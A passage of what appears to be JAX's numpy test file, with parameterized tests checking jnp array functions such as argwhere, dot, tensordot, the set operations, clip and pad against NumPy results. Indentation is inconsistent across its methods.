rng = jtu.rand_some_zero(self.rng())
np_fun = jtu.ignore_warning(
category=DeprecationWarning,
message="Calling nonzero on 0d arrays.*")(np.flatnonzero)
jnp_fun = jnp.flatnonzero
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
# JIT compilation requires specifying the size statically:
jnp_fun = lambda x: jnp.flatnonzero(x, size=np.size(x) // 2)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in all_shapes for dtype in all_dtypes))
def testArgWhere(self, shape, dtype):
rng = jtu.rand_some_zero(self.rng())
np_fun = jtu.ignore_warning(
category=DeprecationWarning,
message="Calling nonzero on 0d arrays.*")(np.argwhere)
jnp_fun = jnp.argwhere
args_maker = lambda: [rng(shape, dtype)]
if shape in (scalar_shapes + [()]) and numpy_version < (1, 18):
self.skipTest("np.argwhere() result for scalar input changed in numpy 1.18.")
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
# JIT compilation requires specifying a size statically. Full test of this
# behavior is in testNonzeroSize().
jnp_fun = lambda x: jnp.argwhere(x, size=np.size(x) // 2)
self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "{}_inshape={}_axis={}".format(
          rec.test_name.capitalize(),
          jtu.format_shape_dtype_string(shape, dtype), axis),
       "rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
       "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
       "axis": axis}
      for rec in JAX_ARGMINMAX_RECORDS
      for shape, dtype in _shape_and_dtypes(rec.shapes, rec.dtypes)
      for axis in range(-len(shape), len(shape))))
  def testArgMinMax(self, np_op, jnp_op, rng_factory, shape, dtype, axis):
    """Compare jnp argmin/argmax (and nan* variants) against numpy."""
    rng = rng_factory(self.rng())
    if dtype == np.complex128 and jtu.device_under_test() == "gpu":
      raise unittest.SkipTest("complex128 reductions not supported on GPU")
    if "nan" in np_op.__name__ and dtype == jnp.bfloat16:
      raise unittest.SkipTest("NumPy doesn't correctly handle bfloat16 arrays")
    def np_fun(array_to_reduce):
      # Cast numpy's index result to jnp's default integer dtype for comparison.
      return np_op(array_to_reduce, axis).astype(jnp.int_)
    def jnp_fun(array_to_reduce):
      return jnp_op(array_to_reduce, axis)
    args_maker = lambda: [rng(shape, dtype)]
    try:
      self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    except ValueError as e:
      # numpy's nan-variants raise on all-NaN slices; jax has no such check.
      if str(e) == "All-NaN slice encountered":
        self.skipTest("JAX doesn't support checking for all-NaN slices")
      else:
        raise
    self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": rec.test_name.capitalize(), "name": rec.name,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name)}
for rec in JAX_ARGMINMAX_RECORDS))
def testArgMinMaxEmpty(self, name, np_op, jnp_op):
name = name[3:] if name.startswith("nan") else name
msg = "attempt to get {} of an empty sequence".format(name)
with self.assertRaises(ValueError, msg=msg):
jnp_op(np.array([]))
with self.assertRaises(ValueError, msg=msg):
jnp_op(np.zeros((2, 0)), axis=1)
np_fun = partial(np_op, axis=0)
jnp_fun = partial(jnp_op, axis=0)
args_maker = lambda: [np.zeros((2, 0))]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_{}_{}".format(
          jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
          jtu.format_shape_dtype_string(rhs_shape, rhs_dtype),
          axes),
       "lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
       "rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype,
       "axes": axes}
      for lhs_shape, rhs_shape, axes in [
          [(2,), (2,), (-1, -1, -1, None)], # scalar output
          [(2, 4), (2, 4), (-1, -1, -1, 0)], # 2D vectors
          [(3, 4), (3, 4), (-1, -1, -1, 0)], # 3D vectors
          [(3, 4), (3, 6, 5, 4), (-1, -1, -1, 0)], # broadcasting
          [(4, 3), (3, 6, 5, 4), (1, 0, -1, None)], # different axes
          [(6, 1, 3), (5, 3), (-1, -1, -1, None)], # more broadcasting
          [(6, 1, 2), (5, 3), (-1, -1, -1, None)], # mixed 2D and 3D vectors
          [(10, 5, 2, 8), (1, 5, 1, 3), (-2, -1, -3, None)], # axes/broadcasting
          [(4, 5, 2), (4, 5, 2), (-1, -1, 0, None)], # axisc should do nothing
          [(4, 5, 2), (4, 5, 2), (-1, -1, -1, None)] # same as before
      ]
      for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
  @jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
  def testCross(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype, axes):
    """Compare jnp.cross against np.cross over axis combinations and dtypes."""
    rng = jtu.rand_default(self.rng())
    args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
    # `axes` packs np.cross's (axisa, axisb, axisc, axis) arguments.
    axisa, axisb, axisc, axis = axes
    jnp_fun = lambda a, b: jnp.cross(a, b, axisa, axisb, axisc, axis)
    def np_fun(a, b):
      # numpy computes bfloat16 inputs via float32; cast back to the
      # promoted dtype so results are comparable.
      a = a.astype(np.float32) if lhs_dtype == jnp.bfloat16 else a
      b = b.astype(np.float32) if rhs_dtype == jnp.bfloat16 else b
      out = np.cross(a, b, axisa, axisb, axisc, axis)
      return out.astype(jnp.promote_types(lhs_dtype, rhs_dtype))
    # Low-precision dtypes need much looser tolerances.
    tol_spec = {dtypes.bfloat16: 3e-1, np.float16: 0.15}
    tol = max(jtu.tolerance(lhs_dtype, tol_spec),
              jtu.tolerance(rhs_dtype, tol_spec))
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                            tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker, atol=tol,
                          rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_{}".format(
name,
jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
jtu.format_shape_dtype_string(rhs_shape, rhs_dtype)),
"lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
"rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype}
for name, lhs_shape, rhs_shape in [
("matrix-scalar", (3, 3), ()),
("scalar-matrix", (), (3, 3)),
("matrix-vector", (4, 5), (5,)),
("vector-matrix", (6,), (6, 4)),
("matrix-matrix", (3, 4), (4, 5)),
("tensor-vector", (4, 3, 2), (2,)),
("vector-tensor", (2,), (3, 2, 4)),
("tensor-matrix", (4, 3, 2), (2, 5)),
("matrix-tensor", (5, 2), (3, 2, 4)),
("tensor-tensor", (2, 3, 4), (5, 4, 1))]
for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
def testDot(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
tol = {np.float16: 1e-2, np.float32: 1e-5, np.float64: 1e-14,
np.complex128: 1e-14}
if jtu.device_under_test() == "tpu":
tol[np.float16] = tol[np.float32] = tol[np.complex64] = 2e-1
def np_dot(x, y):
x = x.astype(np.float32) if lhs_dtype == jnp.bfloat16 else x
y = y.astype(np.float32) if rhs_dtype == jnp.bfloat16 else y
return np.dot(x, y).astype(jnp.promote_types(lhs_dtype, rhs_dtype))
self._CheckAgainstNumpy(np_dot, jnp.dot, args_maker,
tol=tol)
self._CompileAndCheck(jnp.dot, args_maker, atol=tol,
rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_{}".format(
name,
jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
jtu.format_shape_dtype_string(rhs_shape, rhs_dtype)),
"lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
"rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype}
for name, lhs_shape, rhs_shape in [
("vector-vector", (3,), (3,)),
("matrix-vector", (3, 3), (3,)),
("vector-matrix", (3,), (3, 3)),
("matrix-matrix", (3, 3), (3, 3)),
("vector-tensor", (3,), (5, 3, 2)),
("tensor-vector", (5, 3, 2), (2,)),
("matrix-tensor", (5, 2), (3, 2, 4)),
("tensor-matrix", (5, 2, 3), (3, 2)),
("tensor-tensor", (5, 3, 4), (5, 4, 1)),
("tensor-tensor-broadcast", (3, 1, 3, 4), (5, 4, 1))]
for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
def testMatmul(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype):
rng = jtu.rand_default(self.rng())
def np_fun(x, y):
dtype = jnp.promote_types(lhs_dtype, rhs_dtype)
return np.matmul(x, y).astype(dtype)
args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
tol = {np.float16: 1e-2, np.float32: 2e-2, np.float64: 1e-12,
np.complex128: 1e-12}
if jtu.device_under_test() == "tpu":
tol[np.float16] = tol[np.float32] = tol[np.complex64] = 4e-2
self._CheckAgainstNumpy(np_fun, jnp.matmul, args_maker, tol=tol)
self._CompileAndCheck(jnp.matmul, args_maker, atol=tol, rtol=tol)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_{}_{}".format(
          jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
          jtu.format_shape_dtype_string(rhs_shape, rhs_dtype),
          axes),
       "lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
       "rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype,
       "axes": axes}
      for lhs_shape, rhs_shape, axes in [
          [(3,), (), 0],
          [(2, 3, 4), (5, 6, 7), 0],  # from issue #740
          [(2, 3, 4), (3, 4, 5, 6), 2],
          [(2, 3, 4), (5, 4, 3, 6), [1, 2]],
          [(2, 3, 4), (5, 4, 3, 6), [[1, 2], [2, 1]]],
          [(1, 2, 3, 4), (4, 5, 3, 6), [[2, 3], [2, 0]]],
      ]
      for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
  def testTensordot(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype, axes):
    """Compare jnp.tensordot against np.tensordot for int/list/pair axes specs."""
    rng = jtu.rand_default(self.rng())
    args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
    jnp_fun = lambda a, b: jnp.tensordot(a, b, axes)
    def np_fun(a, b):
      # numpy computes bfloat16 inputs via float32; cast the result back to
      # the jnp-promoted dtype for comparison.
      a = a if lhs_dtype != jnp.bfloat16 else a.astype(np.float32)
      b = b if rhs_dtype != jnp.bfloat16 else b.astype(np.float32)
      dtype = jnp.promote_types(lhs_dtype, rhs_dtype)
      return np.tensordot(a, b, axes).astype(dtype)
    tol = {np.float16: 1e-1, np.float32: 1e-3, np.float64: 1e-12,
           np.complex64: 1e-3, np.complex128: 1e-12}
    if jtu.device_under_test() == "tpu":
      tol[np.float16] = tol[np.float32] = tol[np.complex64] = 2e-1
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                            tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker)
def testTensordotErrors(self):
a = np.random.random((3, 2, 2))
b = np.random.random((2,))
self.assertRaisesRegex(
TypeError, "Number of tensordot axes.*exceeds input ranks.*",
lambda: jnp.tensordot(a, b, axes=2))
self.assertRaisesRegex(
TypeError, "tensordot requires axes lists to have equal length.*",
lambda: jnp.tensordot(a, b, axes=([0], [0, 1])))
self.assertRaisesRegex(
TypeError, "tensordot requires both axes lists to be either ints, tuples or lists.*",
lambda: jnp.tensordot(a, b, axes=('bad', 'axes')))
self.assertRaisesRegex(
TypeError, "tensordot axes argument must be an int, a pair of ints, or a pair of lists.*",
lambda: jnp.tensordot(a, b, axes='badaxes'))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_invert={}".format(
jtu.format_shape_dtype_string(element_shape, dtype),
jtu.format_shape_dtype_string(test_shape, dtype), invert),
"element_shape": element_shape, "test_shape": test_shape,
"dtype": dtype, "invert": invert}
for element_shape in all_shapes
for test_shape in all_shapes
for dtype in default_dtypes
for invert in [True, False]))
def testIsin(self, element_shape, test_shape, dtype, invert):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(element_shape, dtype), rng(test_shape, dtype)]
jnp_fun = lambda e, t: jnp.isin(e, t, invert=invert)
np_fun = lambda e, t: np.isin(e, t, invert=invert)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_invert={}".format(
jtu.format_shape_dtype_string(element_shape, dtype),
jtu.format_shape_dtype_string(test_shape, dtype), invert),
"element_shape": element_shape, "test_shape": test_shape,
"dtype": dtype, "invert": invert}
for element_shape in all_shapes
for test_shape in all_shapes
for dtype in default_dtypes
for invert in [True, False]))
def testIn1d(self, element_shape, test_shape, dtype, invert):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(element_shape, dtype), rng(test_shape, dtype)]
jnp_fun = lambda e, t: jnp.in1d(e, t, invert=invert)
np_fun = lambda e, t: np.in1d(e, t, invert=invert)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2)),
"shape1": shape1, "shape2": shape2, "dtype1": dtype1, "dtype2": dtype2}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in all_shapes
for shape2 in all_shapes))
def testSetdiff1d(self, shape1, shape2, dtype1, dtype2):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
self._CheckAgainstNumpy(np.setdiff1d, jnp.setdiff1d, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2)),
"shape1": shape1, "shape2": shape2, "dtype1": dtype1, "dtype2": dtype2}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in nonempty_nonscalar_array_shapes
for shape2 in nonempty_nonscalar_array_shapes))
def testUnion1d(self, shape1, shape2, dtype1, dtype2):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
def np_fun(arg1, arg2):
dtype = jnp.promote_types(arg1.dtype, arg2.dtype)
return np.union1d(arg1, arg2).astype(dtype)
self._CheckAgainstNumpy(np_fun, jnp.union1d, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_size={}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2), size),
"shape1": shape1, "shape2": shape2, "dtype1": dtype1, "dtype2": dtype2, "size": size}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in nonempty_nonscalar_array_shapes
for shape2 in nonempty_nonscalar_array_shapes
for size in [1, 5, 10]))
def testUnion1dSize(self, shape1, shape2, dtype1, dtype2, size):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
def np_fun(arg1, arg2):
dtype = jnp.promote_types(arg1.dtype, arg2.dtype)
result = np.union1d(arg1, arg2).astype(dtype)
if size <= len(result):
return result[:size]
else:
return np.concatenate([result, np.full(size - len(result), result[0], result.dtype)])
def jnp_fun(arg1, arg2):
return jnp.union1d(arg1, arg2, size=size)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_assume_unique={}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2),
assume_unique),
"shape1": shape1, "dtype1": dtype1, "shape2": shape2, "dtype2": dtype2,
"assume_unique": assume_unique}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in all_shapes
for shape2 in all_shapes
for assume_unique in [False, True]))
def testSetxor1d(self, shape1, dtype1, shape2, dtype2, assume_unique):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
jnp_fun = lambda ar1, ar2: jnp.setxor1d(ar1, ar2, assume_unique=assume_unique)
def np_fun(ar1, ar2):
if assume_unique:
# pre-flatten the arrays to match with jax implementation
ar1 = np.ravel(ar1)
ar2 = np.ravel(ar2)
return np.setxor1d(ar1, ar2, assume_unique)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_assume_unique={}_return_indices={}".format(
jtu.format_shape_dtype_string(shape1, dtype1),
jtu.format_shape_dtype_string(shape2, dtype2),
assume_unique,
return_indices),
"shape1": shape1, "dtype1": dtype1, "shape2": shape2, "dtype2": dtype2,
"assume_unique": assume_unique, "return_indices": return_indices}
for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
for shape1 in all_shapes
for shape2 in all_shapes
for assume_unique in [False, True]
for return_indices in [False, True]))
def testIntersect1d(self, shape1, dtype1, shape2, dtype2, assume_unique, return_indices):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
jnp_fun = lambda ar1, ar2: jnp.intersect1d(ar1, ar2, assume_unique=assume_unique, return_indices=return_indices)
np_fun = lambda ar1, ar2: np.intersect1d(ar1, ar2, assume_unique=assume_unique, return_indices=return_indices)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_{}".format(
          jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
          jtu.format_shape_dtype_string(rhs_shape, rhs_dtype)),
       "lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
       "rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype}
      # TODO(phawkins): support integer dtypes too.
      for lhs_shape, lhs_dtype in _shape_and_dtypes(all_shapes, inexact_dtypes)
      for rhs_shape, rhs_dtype in _shape_and_dtypes(all_shapes, inexact_dtypes)
      if len(jtu._dims_of_shape(lhs_shape)) == 0
      or len(jtu._dims_of_shape(rhs_shape)) == 0
      or lhs_shape[-1] == rhs_shape[-1]))
  def testInner(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype):
    """Compare jnp.inner against np.inner; cases are filtered so the trailing
    dimensions match (or one operand is scalar), as np.inner requires."""
    rng = jtu.rand_default(self.rng())
    args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
    def np_fun(lhs, rhs):
      # numpy computes bfloat16 inputs via float32; cast back to the
      # jnp-promoted dtype for comparison.
      lhs = lhs if lhs_dtype != jnp.bfloat16 else lhs.astype(np.float32)
      rhs = rhs if rhs_dtype != jnp.bfloat16 else rhs.astype(np.float32)
      dtype = jnp.promote_types(lhs_dtype, rhs_dtype)
      return np.inner(lhs, rhs).astype(dtype)
    jnp_fun = lambda lhs, rhs: jnp.inner(lhs, rhs)
    tol_spec = {np.float16: 1e-2, np.float32: 1e-5, np.float64: 1e-13,
                np.complex64: 1e-5}
    if jtu.device_under_test() == "tpu":
      tol_spec[np.float32] = tol_spec[np.complex64] = 2e-1
    tol = max(jtu.tolerance(lhs_dtype, tol_spec),
              jtu.tolerance(rhs_dtype, tol_spec))
    # TODO(phawkins): there are float32/float64 disagreements for some inputs.
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                            tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=False, atol=tol,
                          rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_amin={}_amax={}".format(
jtu.format_shape_dtype_string(shape, dtype), a_min, a_max),
"shape": shape, "dtype": dtype, "a_min": a_min, "a_max": a_max}
for shape in all_shapes for dtype in number_dtypes
for a_min, a_max in [(-1, None), (None, 1), (-0.9, 1),
(-np.ones(1), None),
(None, np.ones(1)),
(np.full(1, -0.9), np.ones(1))]))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testClipStaticBounds(self, shape, dtype, a_min, a_max):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.clip(x, a_min=a_min, a_max=a_max)
jnp_fun = lambda x: jnp.clip(x, a_min=a_min, a_max=a_max)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
def testClipError(self):
with self.assertRaisesRegex(ValueError, "At most one of a_min and a_max.*"):
jnp.clip(jnp.zeros((3,)))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_decimals={}".format(
jtu.format_shape_dtype_string(shape, dtype), decimals),
"shape": shape, "dtype": dtype, "decimals": decimals}
for shape, dtype in _shape_and_dtypes(all_shapes, number_dtypes)
for decimals in [0, 1, -2]))
def testRoundStaticDecimals(self, shape, dtype, decimals):
rng = jtu.rand_default(self.rng())
if jnp.issubdtype(dtype, np.integer) and decimals < 0:
self.skipTest("Integer rounding with decimals < 0 not implemented")
np_fun = lambda x: np.round(x, decimals=decimals)
jnp_fun = lambda x: jnp.round(x, decimals=decimals)
args_maker = lambda: [rng(shape, dtype)]
tol = {jnp.bfloat16: 5e-2, np.float16: 1e-2}
check_dtypes = shape is not jtu.PYTHON_SCALAR_SHAPE
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=check_dtypes, tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=check_dtypes,
atol=tol, rtol=tol)
def testOperatorRound(self):
self.assertAllClose(round(np.float32(7.532), 1),
round(jnp.float32(7.5), 1))
self.assertAllClose(round(np.float32(1.234), 2),
round(jnp.float32(1.234), 2))
self.assertAllClose(round(np.float32(1.234)),
round(jnp.float32(1.234)), check_dtypes=False)
self.assertAllClose(round(np.float32(7.532), 1),
round(jnp.array(7.5, jnp.float32), 1))
self.assertAllClose(round(np.float32(1.234), 2),
round(jnp.array(1.234, jnp.float32), 2))
self.assertAllClose(round(np.float32(1.234)),
round(jnp.array(1.234, jnp.float32)),
check_dtypes=False)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_shape={}_mode={}_padwidth={}_constantvalues={}".format(
          jtu.format_shape_dtype_string(shape, dtype), mode, pad_width,
          constant_values),
       "shape": shape, "dtype": dtype, "mode": mode,
       "pad_width": pad_width, "constant_values": constant_values}
      for mode, shapes in [
          ('constant', all_shapes),
          ('wrap', nonempty_shapes),
          ('edge', nonempty_shapes),
      ]
      for shape, dtype in _shape_and_dtypes(shapes, all_dtypes)
      for constant_values in [
          # None is used for modes other than 'constant'
          None,
          # constant
          0, 1,
          # (constant,)
          (0,), (2.718,),
          # ((before_const, after_const),)
          ((0, 2),), ((-1, 3.14),),
          # ((before_1, after_1), ..., (before_N, after_N))
          tuple((i / 2, -3.14 * i) for i in range(len(shape))),
      ]
      for pad_width in [
          # ((before_1, after_1), ..., (before_N, after_N))
          tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
          # ((before, after),)
          ((1, 2),), ((2, 0),),
          # (before, after)  (not in the docstring but works in numpy)
          (2, 0), (0, 0),
          # (pad,)
          (1,), (2,),
          # pad
          0, 1,
      ]
      # constant_values is only valid (and only None is valid otherwise) for
      # mode='constant'; empty specs are excluded.
      if (pad_width != () and constant_values != () and
          ((mode == 'constant' and constant_values is not None) or
           (mode != 'constant' and constant_values is None)))))
  def testPad(self, shape, dtype, mode, pad_width, constant_values):
    """Compare jnp.pad against np.pad for constant/wrap/edge modes and every
    supported pad_width / constant_values spelling."""
    rng = jtu.rand_default(self.rng())
    args_maker = lambda: [rng(shape, dtype)]
    if constant_values is None:
      np_fun = partial(np.pad, pad_width=pad_width, mode=mode)
      jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode)
    else:
      np_fun = partial(np.pad, pad_width=pad_width, mode=mode,
                       constant_values=constant_values)
      jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode,
                        constant_values=constant_values)
    # Python scalars promote differently, so skip dtype checks there.
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                            check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_shape={}_mode={}_pad_width={}_stat_length={}".format(
          jtu.format_shape_dtype_string(shape, dtype), mode, pad_width, stat_length),
       "shape": shape, "dtype": dtype, "mode": mode, "pad_width": pad_width,
       "stat_length": stat_length}
      for mode in ['maximum', 'minimum', 'mean', 'median']
      for shape, dtype in _shape_and_dtypes(nonempty_shapes, all_dtypes)
      for pad_width in [
          # ((before_1, after_1), ..., (before_N, after_N))
          tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
          # ((before, after),)
          ((1, 2),), ((2, 0),),
          # (before, after)  (not in the docstring but works in numpy)
          (2, 0), (0, 0),
          # (pad,)
          (1,), (2,),
          # pad
          0, 1,
      ]
      for stat_length in [
          None,
          # ((before_1, after_1), ..., (before_N, after_N))
          tuple(((i % 3 + 1), ((i + 1) % 3) + 1) for i in range(len(shape))),
          # ((before, after),)
          ((1, 2),), ((2, 2),),
          # (before, after)  (not in the docstring but works in numpy)
          (1, 1), (3, 4),
          # (pad,)
          (1,), (2,),
          # pad
          1, 2
      ]
      # Empty specs are excluded, as is mode='mean' on booleans.
      if (pad_width != () and stat_length != () and
          not (dtype in bool_dtypes and mode == 'mean'))))
  def testPadStatValues(self, shape, dtype, mode, pad_width, stat_length):
    """Compare jnp.pad against np.pad for the statistic-based pad modes
    (maximum/minimum/mean/median) across stat_length spellings."""
    rng = jtu.rand_default(self.rng())
    args_maker = lambda: [rng(shape, dtype)]
    np_fun = partial(np.pad, pad_width=pad_width, mode=mode, stat_length=stat_length)
    jnp_fun = partial(jnp.pad, pad_width=pad_width, mode=mode, stat_length=stat_length)
    # Python scalars promote differently, so skip dtype checks there.
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                            check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
    self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_mode={}_pad_width={}_reflect_type={}".format(
        jtu.format_shape_dtype_string(shape, dtype), mode, pad_width, reflect_type),
     "shape": shape, "dtype": dtype, "mode": mode, "pad_width": pad_width,
     "reflect_type": reflect_type}
    for mode in ['symmetric', 'reflect']
    for shape, dtype in _shape_and_dtypes(nonempty_shapes, all_dtypes)
    for pad_width in [
        # ((before_1, after_1), ..., (before_N, after_N))
        tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
        # ((before, after),)
        ((1, 2),), ((2, 3),),
        # (before, after)  (not in the docstring but works in numpy)
        (2, 1), (1, 2),
        # (pad,)
        (1,), (2,), (3,),
        # pad
        0, 5, 7, 10
    ]
    for reflect_type in ['even', 'odd']
    if (pad_width != () and
        # following types lack precision when calculating odd values
        (reflect_type != 'odd' or dtype not in [np.bool_, np.float16, jnp.bfloat16]))))
def testPadSymmetricAndReflect(self, shape, dtype, mode, pad_width, reflect_type):
  """Checks jnp.pad against np.pad for the mirror-based padding modes."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  pad_kwargs = dict(pad_width=pad_width, mode=mode, reflect_type=reflect_type)
  np_fun = partial(np.pad, **pad_kwargs)
  jnp_fun = partial(jnp.pad, **pad_kwargs)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE,
                          tol={np.float32: 1e-3, np.complex64: 1e-3})
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_mode={}_pad_width={}_end_values={}".format(
        jtu.format_shape_dtype_string(shape, dtype), "linear_ramp", pad_width, end_values),
     "shape": shape, "dtype": dtype, "pad_width": pad_width,
     "end_values": end_values}
    for shape, dtype in _shape_and_dtypes(nonempty_shapes, all_dtypes)
    for pad_width in [
        # ((before_1, after_1), ..., (before_N, after_N))
        tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
        # ((before, after),)
        ((1, 2),), ((2, 0),),
        # (before, after)  (not in the docstring but works in numpy)
        (2, 0), (0, 0),
        # (pad,)
        (1,), (2,),
        # pad
        0, 1,
    ]
    for end_values in [
        # ((before_1, after_1), ..., (before_N, after_N))
        tuple((i % 3, (i + 1) % 3) for i in range(len(shape))),
        # ((before, after),)
